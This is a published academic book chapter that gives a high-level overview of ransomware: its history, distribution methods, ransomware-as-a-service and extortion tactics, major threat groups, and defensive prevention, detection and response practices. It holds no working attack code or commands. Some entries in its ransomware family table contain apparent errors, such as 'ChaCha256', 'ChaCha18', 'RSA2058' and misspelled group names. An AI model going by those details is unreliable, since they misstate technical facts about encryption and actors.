Open access peer-reviewed chapter

Perspective Chapter: Ransomware

Written By

Arun Warikoo

Submitted: 21 September 2022 Reviewed: 04 October 2022 Published: 24 January 2023

DOI: 10.5772/intechopen.108433

From the Edited Volume

Malware - Detection and Defense

Edited by Eduard Babulak

Chapter metrics overview

269 Chapter Downloads

View Full Metrics

Abstract

Ransomware refers to a type of malware that encrypts files on an infected computer and holds the key to decrypt the files until the victim pays a ransom. Ransomware has seen explosive growth over the past few years and has rapidly evolved into a highly lucrative business model. Sophisticated advanced persistent threats (APTs) are employing ransomware to maximize their profits with multiple layers of monetization strategies. New versions appear frequently with ever-evolving tactics and techniques making detection harder. In this chapter, we present a brief history of ransomware, top threat actors employing ransomware, tactics used, and key strategies firms need to deploy to prevent, detect, and respond to ransomware in attacks.

Keywords

  • ransomware
  • extortion
  • threat actor groups
  • tactics
  • prevention
  • detection
  • response

1. Introduction

Ransomware attacks have emerged as one of the most prominent cyberattacks in the last 5 years affecting organizations globally. The Verizon Data Breach Investigation Report (DBIR) 2021 states that 37% of global organizations said that they were hit by ransomware [1]. The world saw a 151% year-on-year increase in the number of ransomware attacks by mid-2021 [2].

Ransomware is a family of malware that is designed to block or limit victims from accessing their system by either locking the system’s screen or encrypting files on a system until ransom is paid. Ransom operators demand the victim to pay the ransom in crypto, usually, bitcoin.

Ransomware variants are of two types—encryptors and lockers [3]. The encrypting ransomware encrypts the files on the victim’s machine and demands a ransom for the decryption key. On the other hand, lockers do not encrypt the file but lock the victim’s system so that the files are inaccessible.

Ransomware tactics and techniques have evolved considerably over the years. The evolution of ransomware can be broken down into three key timeframes: pre-2014, between 2015 and 2017, and post-2017. During the pre-2014 era, ransomware attacks were widespread but random with a very low ransom demand. Post-2015, attackers started deploying ransomware post-exploitation. This shift reduced the number of victims that an attacker could exploit, but this gave operators much more control over ransomware deployment. This enabled targeted and successful encryption of files on the victim’s network and justified demands for a higher ransom. Led to the rise of targeted attacks that were highly successful leading to a higher ransom demand. Post-2017, the ransomware threat landscape witnessed the emergence of ransomware as a service (RaaS) and big game hunting (BGH). Big game hunting refers to when attackers leverage ransomware to target large and high-value organizations [4].

Subsequent sections highlight a brief history on ransomware, how ransomware is distributed, high-profile ransomware groups, and how to prevent, defend, and respond to ransomware attacks.

Advertisement

2. A brief history of ransomware

This section details a brief history on ransomware from its inception as a petty cybercriminal act into what is now a billion-dollar cyber-crime industry.

The first known ransomware attack occurred in 1989 and targeted the healthcare industry. An individual known as Joseph Popp, an AIDS researcher, carried out the attack by mailing 20,000 floppy disks to the WHO AIDS conference event attendees [5]. The attacker employed social engineering to trick the victims by claiming that the disks contained a questionnaire to determine an individual’s risk of acquiring AIDS. However, the disk also contained a malware that was dubbed as the AIDS Trojan that encrypted files on the victim’s machine and displayed a message demanding a payment of $189 to a P.O. box in Panama in exchange for access to their files [5]. AIDS Trojan used a simple symmetric encryptor to encrypt file names and a decryption key was soon available to decrypt them [6].

Figure 1 highlights the timeline on ransomware since the launch of AIDS Trojan in 1989 to Hive in 2022.

Figure 1.

Ransomware timeline.

The first modern ransomware, GPCode, was launched in 2004 and infected systems via phishing emails [6]. GPCode also known as GPCoder used symmetric encryption to encrypt files and requested $20 for a decryption key [5]. The Year 2006 saw the launch of Archievus that employed strong encryption for the first time and used an advanced 1024-bit RSA encryption [5]. Reveton emerged in 2012 as a ransomware locker, a variant that displayed fraudulent law enforcement messages accusing victims of committing a crime. The attackers threatened victims with jail time if the ransom was not paid [5]. The year 2013 saw the emergence of a ransomware strain known as CryptoLocker that was delivered via phishing emails. CryptoLocker used strong 2048 RSA encryption and was both a locker and a crypto variant [5]. CryptoWall gained notoriety after the downfall of the infamous CryptoLocker in 2014 and was widely distributed using various exploit kits and spam campaigns. TeslaCrypt gained notoriety in 2015 and targeted computer gamers. After a successful infection, the malicious program demands a $500 ransom for the decryption key; if the victim delays, the ransom doubles.

Petya emerged in 2016 as the first ransomware variant to not encrypt individual files but overwrite the master boot record and encrypt the master file table. These locked victims out of their entire hard drive more quickly than other ransomware techniques [5]. The infamous WannaCry shocked the world in 2017 and hit hundreds of thousands of machines across more than 150 countries. WannaCry spread via the Eternal Blue vulnerability, an exploit leaked from the National Security Agency [5]. A major cyberattack began targeting Ukraine in June 2017 using a new variant on Petya known as NotPetya. NotPetya soon spread and impacted organizations globally. In 2018, a sophisticated ransomware variant known as Ryuk was released and became one of the most successful ransomware campaigns of its time. Ryuk attacks were targeted, and ransom amounts associated with Ryuk typically range between 15 and 50 Bitcoins, or roughly between $100,000 and $500,000 [7]. REvil, also known as Sodinokibi, first appeared in April 2019 and immediately became immensely successful [8]. Another ransomware variant by the name Maze was discovered in 2019 and introduced the tactic of double extortion wherein data are exfiltrated before ransomware deployment. Shortly after Maze disbanded in 2020, the Egregor RaaS double extortion variant appeared. 2020 saw the emergence of a Conti and Darkside that were responsible for major cyber incidents globally. LockBit 2.0, a new variant of Lockbit with advanced capabilities appeared in 2021. LockBit 3.0, the current version, was discovered in June 2022 and has added a Big Bounty Program (BBP) to its arsenal [9]. The year 2022 saw the fall of a notorious ransomware group known as Conti and the emergence of new groups such as Blackbasta, Hive, and Quantum that continue to drive the ransomware threat landscape [10].

Figure 2 highlights significant ransomware incidents that have occurred over the last 5 years.

Figure 2.

Significant ransomware incidents.

Figure 3 shows the various stages involved in a ransomware attack.

Figure 3.

Ransomware attack chain.

Advertisement

3. Distribution methods

Ransomware is spread through multiple distribution methods. These are as follows:

Phishing—The most common attack vector used by attackers as shown in Figure 4. Attackers send an email that is designed to lure the victim to open the weaponized office attachments. When the user opens the attachment (word or excel) and enables the macros, a malicious program is executed that executes a PowerShell command to download a 2nd stage malware from the Command and Control (C2) Server. Additional payloads are downloaded for lateral movement and once control is gained on the active directory (AD) domain, the attacker downloads ransomware as a final payload and deploys it to multiple devices.

Figure 4.

Attack vector phishing.

Exploit kits—An exploit kit is a toolkit designed to exploit vulnerabilities on victim’s system while web browsing. When a user visits a compromised website, the victim is redirected to another landing page. The victim’s machine is scanned for any browser-based vulnerabilities and malware is downloaded. Ransomware groups employ malvertising to redirect users to the attacker’s website, exploit is executed that leads to the eventual deployment of ransomware (Figure 5).

Figure 5.

Attack vector exploit kit.

Buying credentials from access brokers—Attackers buy credentials from initial access brokers (IABs) to gain initial access. Remote desktop protocol (RDP) is the most common credential used to achieve a foothold.

Exploiting vulnerabilities—Ransomware operators also gain initial access by exploiting vulnerabilities in Internet-facing applications.

3rd Party Vendor—Supply chain has become the latest attack vector that has led to ransomware deployment.

Advertisement

4. Ransomware threat landscape

The modern ransomware threat landscape is driven by the advent of the ransomware as a service (RaaS) business model and the adoption of multiple levels of extortion.

4.1 Ranvsomware as a service

Ransomware as a service (RaaS) is a business model launched by ransomware operators wherein the operators sell ransomware to their customers known as affiliates in exchange of a cut from the ransom. The affiliates launch the cyberattack against the victims whereas negotiations with the victim are managed by the operator.

RaaS has taken ransomware to a whole new plane and is one of the primary reasons why ransomware attacks have become so frequent. RaaS business model is a win-win situation for all the parties involved. A report by Crowdstrike, a cybersecurity firm, states that the ransomware revenues in 2020 were around $20 billion, up from $11.5 billion the previous year [11].

The operator now only focuses on developing and monetizing its product. Less sophisticated actors with very little knowledge can enter the playing field, buy the service, and launch targeted attacks. Figure 6 highlights the RaaS ecosystem. The ecosystem also comprises of initial access brokers (IABs) and Mules. Access brokers are an important component as they are the ones who scan the networks to look for vulnerabilities and gain credential access. Access brokers sell credentials access to the affiliates who leverage that for initial access during an intrusion. The RaaS operators handle the ransom negotiations with the victim. Mules complete the ecosystem and are used for converting cryptocurrency into real currency.

Figure 6.

The RaaS ecosystem.

4.2 Extortion

The advent of extortion as a tactic has emerged as one of the major reasons for high-profile ransomware attacks in the last few years. Three are four types of extortion prevalent that are highlighted in Figure 7.

Figure 7.

Types of ransomware extortion.

Single extortion refers to the deployment of ransomware post-exploitation. The attacker demands a ransom in exchange for decrypting the files.

Double extortion refers to attackers exfiltrating data before the deployment of ransomware. The attacker then threatens the victim to leak the data publicly. The Maze ransomware group pioneered this when they added double extortion as a tactic to their playbook. More threat actors followed suit had started to have dedicated leak sites (DLS) to release the stolen data.

In 2020, threat actors took extortion to another level and added DDoS attacks to encryption and data exposure threats. This is known as triple extortion. This was first performed by SunCrypt and RagnarLocker operators in the latter half of 2020 [12].

In 2021, a fourth level known as Quadruple extortion was introduced. With quadruple extortion, ransomware operators also reach out directly to a victim’s customers and stakeholders, thereby adding more pressure to the victim. DarkSide operators employ the quadruple extortion scheme in some of their attacks by launching DDoS attacks and directly contacting customers through designated call centers [12].

Advertisement

5. Ransomware groups

This section highlights some of the high-profile threat actors that have revolutionized ransomware campaigns.

Conti also known as Wizard Spider is a Russia-based cybercriminal operational since 2016 [13]. The group is known for being the operator of Ryuk and Conti ransomware variants and resorts to big game hunting (BGH). Conti used the Ryuk ransomware variant since September 2018 but switched to Conti in 2020 [14].

Carbon Spider also known as FIN7 is another Russia-based cybercriminal that operated since 2013. The group pivoted to ransomware and big game hunting in 2020 and marketed its own RaaS program dubbed as “DarkSide” [15]. In May 2021, the Colonial Pipeline ransomware attack made headlines across the globe that FBI attributed to the DarkSide group [16].

Pinchy Spider is a sophisticated cybercriminal operational since 2018 that is known to be operation of the REvil RaaS program [17]. Pinchy Spider is associated with some of the most high-profile ransomware attacks in history.

The LockBit group is a sophisticated cybercriminal operational since 2019. The group is known to consistently develop new tactics and techniques to stay ahead of other ransomware groups [12]. In 2021, a new variant known as Lockbit 2.0 was released that followed the RaaS model and LockBit 2.0 operators allegedly only work with experienced penetration testers [18].

BlackByte is ransomware as a service (RaaS) that first emerged in July 2021 and primarily exploits vulnerabilities to gain a foothold in the victim’s environment [19].

Table 1 highlights significant ransomware families over the years with additional details such as operator, operating since, and encryption.

Ransomware NameOperated ByOperational SinceWritten InEncryptionTarget PlatformsRaaS ModelExtortionBig Bounty Program
TeslaCryptNA2015C++AES256WindowsNoNoNo
WannaCryLazarus Group2017C/C++RSAWindowsNoNoNo
BitPaymerIndrik Spider2017C/C++RC4 and RSAWindowsNoNoNo
DoppelPaymerDoppel Spider2019CRC4 and RSAWindowsNoNoNo
SunCryptSunCrypt2019GO, C & C++RSAWindowsYesTripleNo
ClopFIN11 aka TA5052019CRC4WindowsYesDoubleNo
RagnarLockerRagnarGroup2019CSalsa20 RSA-1024WindowsDoubleNo
MazeTwisted Spider2019CChaCha20WindowsYesDoubleNo
Egregor2020C/C++ChaCha8 RSA-1024WindowsYesDoubleNo
RyukWizard Spider aka Conli2018C/C++AES-256 RSA-4096WindowsYesSingleNo
Conti2020C/C++ChaCha18 RSA-1024Windows LinuxYesDoubleNo
DarksideCarbon Spider aka FIN72020CSalsa20 RSA-1024Windows LinuxYesDoubleNo
Blackmatter2021CSalsa20 RSA-1024Windows LinuxYesDoubleNo
REvil aka Sodinokibi, GandCrabPinchy Spider2019CRSAWindows LinuxYesTripleNo
LokbitLockbit Group2019CAES-128WindowsYesDoubleNo
Lockbit 2.02021CAES-128 Curve25519WindowsYesDoubleNo
Lockbit3.02022CChaCha256WindowsYesDoubleYes
HelloKiltyFiveHands Group2021C++AES256 RSA2058WindowsYesDoubleNo
AvosLockerAvos Group2021C/C++AES256Windows Linux VMware ESXYesDoubleNo
BlackCat aka AlphvBlackCat group2021RustAES ChaCha20Windows Linux VMware ESXYesTripleNo
BlackBastaBlackBasta group2022C++ChaCha20 RSA-4096Windows Linux VMware ESXYesDoubleNo

Table 1.

Ransomware families.

Advertisement

6. Ransomware prevention, detection, and response

Organizations need to take a multipronged approach to prevent and defend against a ransomware attack. The best strategy to tackle ransomware is a combination of prevention, detection, and recovery capabilities.

6.1 Prevention

Organizations need to have controls in place to cover all the distribution methods as highlighted in Section 3 and as part of defense-in-depth deploy controls at multiple levels.

At the network layer, organizations need to implement solutions such as Email Gateway Security and a sandbox solution to prevent against phishing campaigns which is the most common attack vector for ransomware. Web application firewalls (WAFs) enable in preventing initial access from exploits that target public-facing applications. Intrusion prevention systems (IPS) and content filtering solutions enable in preventing communication with command and control servers. Most sophisticated ransomware operations also exfiltrate data as a form of extortion. Data loss prevention (DLP) solutions are an important control for preventing against data leakage.

At the endpoint layer, apart from an anti-virus (AV) solution, organizations need to implement endpoint detection and response (EDR) solutions to detect malicious activity such as the spawning of a malicious process. In addition, organizations need to configure their information technology (IT) environment to prevent enabling of macros in documents received from outside the network without interrupting any business processes. It is also advisable to install browser protection and ad blocking on end-user workstations as this will prevent JavaScript-based malware from executing on the system [20].

Organizations must also have a robust vulnerability management program that focuses on hardening workstations and servers within the network. Attackers leverage exploit kits to exploit a vulnerability in systems and technologies. As an example, the Locky ransomware is frequently delivered via the Rig exploit kit that targets some of the Adobe flash vulnerabilities [20]. Therefore, it is imperative to have your systems and applications fully patched and up to date.

Most ransomware distribution methods require end-user interaction. Therefore, organizations need to create a robust security awareness training for their employees and train them on how attackers leverage social engineering to trick the users.

6.2 Detection

Detective controls play an important role in the fight against ransomware. In a modern ransomware attack, there is a significant dwell time before ransomware is deployed and executed. With the advent of big game hunting, attackers spend considerable time in identifying high-value targets post-compromise. The dwell can be as little as a few days and can go up to weeks before the deployment of ransomware. This enables defenders to deploy detective controls in order to identifying unusual activity pointing to an ongoing ransomware attack.

Ransomware detection can be done by mirroring the behavior depicted by various ransomware variants. Ransomware behavior involves the generation of network traffic to C2servers that includes domain name service (DNS) queries [21]. Detective controls such as an intrusion detection system (IDS) and a security information and event management (SIEM) have inbuilt signatures and rules to detect for such events. In addition, custom rules can be created to look for specific behaviors such as anomalous SMB traffic, creation of new privileged accounts, anomalous outbound traffic, and monitoring of processes and PowerShell. Alerts from detective controls are investigated in a Security Operations Centre (SOC). Alerts from detective controls have a high false positive rate and it is imperative that SOC analysts work with the threat detection team to tune the platforms and reduce the noise [22].

Organizations need to develop cyber fusion capabilities to tackle advanced persistent threats. This can be achieved by the creation of a Cyber Defense Centre (CDC) that comprises of teams such as CSIRT, Red Team, VA, threat detection, and cyber threat intelligence team (CTI). Cyber threat intelligence plays a vital role in providing intel on ongoing campaigns to ensure that your enterprise defenders are ready for the threat and know what to look for. Organizations also need to conduct Table Top exercises quarterly and look at specific scenarios based on intel received from the threat intelligence team.

6.3 Response

It is imperative to create a Ransomware Incident Response Plan that will be executed by an organization’s computer security incident response team (CSIRT).

Identify the infected systems within the network and isolate the infected devices immediately. It is extremely important to determine the scope of the infection. Look for symptoms such as file name changes and service tickets from employees on not able to access files.

Secure your backup data by taking them offline and ensure that the backup data is not infected by running a full scan [23]. Restore compromised files with backup data once all the devices have been decrypted and running antivirus.

The incident response team must also identify the attack vector and chart out the attack timeline. This is important to help in identifying how the attack happened, identifying the control gaps, and preventing recurring ransomware attacks in the future.

Report the incident to law enforcement immediately as typical ransomware attacks involve data leaks. Within the United States, report the incident to the nearest FBI office which can help identify those responsible and prevent future attacks [23].

Once normal operations resume, it is always advisable and recommended to conduct a post-incident activity to review the lessons learned from the ransomware attack.

Advertisement

7. Conclusion

Ransomware has become one of the most prevalent cybercrimes that threat actors leverage to maximize their profits. Nation-state actors have also employed ransomware to maximize their geopolitical interests. Organizations can no longer rely on resiliency and backups to thwart such attacks. Threat actors have evolved their tactics and are now employing multiple layers of extortion to threaten victims. The advent of RaaS has made matters worse as less sophisticated attackers can also launch ransomware attacks by buying the service.

Organizations need to employ a multipronged strategy to prevent, defend, and respond to such persistent attacks. Firms need to invest deeply in building a cyber fusion model that focuses on developing collaboration and cohesiveness between various cyber defense teams. Cyber threat intelligence exchange with ISACs and law enforcement agencies is extremely important to gain an understanding on the campaigns of interest. It is also recommended to adopt a Zero Trust Approach while designing the network.

Advertisement

Nomenclature

ADActive Directory
AIDSAcquired Immunodeficiency Syndrome
APTAdvanced Persistent Threat
ATT & CKAdversarial Tactics, Techniques, and Common Knowledge
AVAnti-virus
BBPBig Bounty Program
BGHBig Game Hunting
BTCBitcoin
C2Command and Control
CDCCyber Defense Centre
CISACybersecurity and Infrastructure Agency
CSIRTComputer Security Incident Response Team
CTICyber Threat Intelligence
CVSSCommon Vulnerability Scoring System
DBIRData Beach Investigation Report
DLPData Loss Prevention
DLSData Leak Sites
DGADomain Generation Algorithm
DNSDomain Name Service
DoSDenial of Service
DDoSDistributed Denial of Service
EDREndpoint Detection and Response
ECDSAElliptic Curve Digital Signature Algorithm
FBIFederal Bureau of Investigation
IABInitial Access Broker
ITInformation Technology
IDSIntrusion Detection System
IPSIntrusion Prevention Systems
IRIncident Response
ISACInformation Sharing and Analysis Centers
MFAMulti-Factor Authentication
NISTNational Institute of Standards and Technology
OSINTOpen Source Intelligence
RaaSRansomware as a Service
RDPRemote Desktop Protocol
RSARivest-Shamir-Adleman
SIEMSecurity Information and Event Management
SOCSecurity Operations Center
SQLiStructured Query Language Injection
TBTerabyte
TTPTactics Techniques and Procedures
VAVulnerability Assessment
VPNVirtual Private Network
XSSCross Site Scripting
WAFWeb Application Firewall
WHOWorld Health Organization

References

  1. 1. Bassett G, Hylender D, Langlois P, Pinto A, Widup S. Verizon Data Breach Investigation Report [Internet]. 2021. Available from: https://www.researchgate.net/publication/351637233_2021_Verizon_Data_Breach_Investigations_Report [Accessed: September 19, 2022]
  2. 2. Sonica Wall. Cyber Threat Report: Mid-Year Update [Internet]. 2021. Available from: https://www.sonicwall.com/resources/white-papers/mid-year-2021-sonicwall-cyber-threat-report/ [Accessed: September 19, 2022]
  3. 3. Aurangzeb S, Aleem M, Iqbal M, Islam A. Ransomware: A Survey and Trends [Internet]. 2017. Available from: https://www.researchgate.net/publication/317380115_Ransomware_A_Survey_and_Trends [Accessed: September 19, 2022]
  4. 4. Cyber Big Game Hunting [Internet]. 2022. Available from: https://www.crowdstrike.com/cybersecurity-101/cyber-big-game-hunting [Accessed: September 19, 2022]
  5. 5. Harford, I. The history and evolution of ransomware [Internet]. 2021. Available from: https://www.techtarget.com/searchsecurity/feature/The-history-and-evolution-of-ransomware [Accessed: September 16, 2022]
  6. 6. Richardson R, North M. Ransomware: Evolution, Mitigation and Prevention. Vol. 4276. Faculty Publications; 2017. Available from: https://digitalcommons.kennesaw.edu/facpubs/4276
  7. 7. Constantin L. Ryuk explained: Targeted, devastatingly effective ransomware [Internet]. 2021. Available from: https://www.csoonline.com/article/3541810/ryuk-explained-targeted-devastatingly-effective-ransomware.html [Accessed: September 16, 2022]
  8. 8. Constantin L. REvil ransomware explained: A widespread extortion operation [Internet]. 2021. Available from: https://www.csoonline.com/article/3597298/revil-ransomware-explained-a-widespread-extortion-operation.html [Accessed: September 16, 2022]
  9. 9. Myers L. LockBit 3.0 Ransomware Abuses Windows Defender to Load Cobalt Strike [Internet]. 2022. Available from: https://blogs.blackberry.com/en/2022/08/lockbit-3-0-ransomware-abuses-windows-defender-to-load-cobalt-strike [Accessed: September 19, 2022]
  10. 10. Righi I. Ransomware in Q2 2022: Ransomware is Back in Business [Internet]. 2022. Available from: https://www.digitalshadows.com/blog-and-research/ransomware-in-q2-2022-ransomware-is-back-in-business/ [Accessed: September 19, 2022]
  11. 11. Baker K. Ransomware as a Service (RaaS) Explained [Internet]. 2022. Available from: https://www.crowdstrike.com/cybersecurity-101/ransomware/ransomware-as-a-service-raas/ [Accessed: September 19, 2022]
  12. 12. Trend Micro Research. Lockbit [Internet]. 2022. Available from: https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-lockbit [Accessed: September 13, 2022]
  13. 13. Feeley B, Hartley B. Lunar Spider Sharing the Same Web [Internet]. 2019. Available from: https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/ [Accessed: September 17, 2022]
  14. 14. Hanel A. Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware [Internet]. 2019. Available from: https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/ [Accessed: September 17, 2022]
  15. 15. Sood K, Hurley S, Arsene L. Dark Side Goes Dark: How Crowd Strike Falcon Customers Were Protected [Internet]. 2021. Available from: https://www.crowdstrike.com/blog/falcon-protects-from-darkside-ransomware/ [Accessed: September 17, 2022]
  16. 16. Osborne C. Dark Side explained: The ransomware group responsible for Colonial Pipeline attack [Internet]. 2019. Available from: https://www.zdnet.com/article/darkside-the-ransomware-group-responsible-for-colonial-pipeline-cyberattack-explained/ [Accessed: September 17, 2022]
  17. 17. Meyers A. The Evolution of PINCHY SPIDER from Gand Crab to REvil [Internet]. 2021. Available from: https://www.crowdstrike.com/blog/the-evolution-of-revil-ransomware-and-pinchy-spider/ [Accessed: September 17, 2022]
  18. 18. Elsad A, Gumarin JR, Barr A. LockBit 2.0: How This RaaS Operates and How to Protect Against It [Internet]. 2022. Available from: https://unit42.paloaltonetworks.com/lockbit-2-ransomware/ [Accessed: September 18, 2022]
  19. 19. Elsad A. Threat Assessment: BlackByte Ransomware [Internet]. 2022. Available from: https://unit42.paloaltonetworks.com/blackbyte-ransomware/ [Accessed: September 19, 2022]
  20. 20. Liska A, Gallo T. Ransomware. OReilly; 2016. pp. 53-55. ISBN: 978-1-491-96788-1
  21. 21. Berrueta E, Morato D, Magana E, Izal M. A Survey on Detection Techniques for Cryptographic Ransomware. IEEE; 2019. DOI: 10.1109/ACCESS.2019.2945839
  22. 22. Hills M, editor. Why Cyber Security Is a Socio-Technical Challenge: New Concepts and Practical Measures to Enhance Detection. Nova; 2016. p. 188. ISBN: 978-1-53610-090-7
  23. 23. Hassan A. Ransomware Revealed. Apress; 2009. 209 p. DOI: 10.1007/9781484242551

Written By

Arun Warikoo

Submitted: 21 September 2022 Reviewed: 04 October 2022 Published: 24 January 2023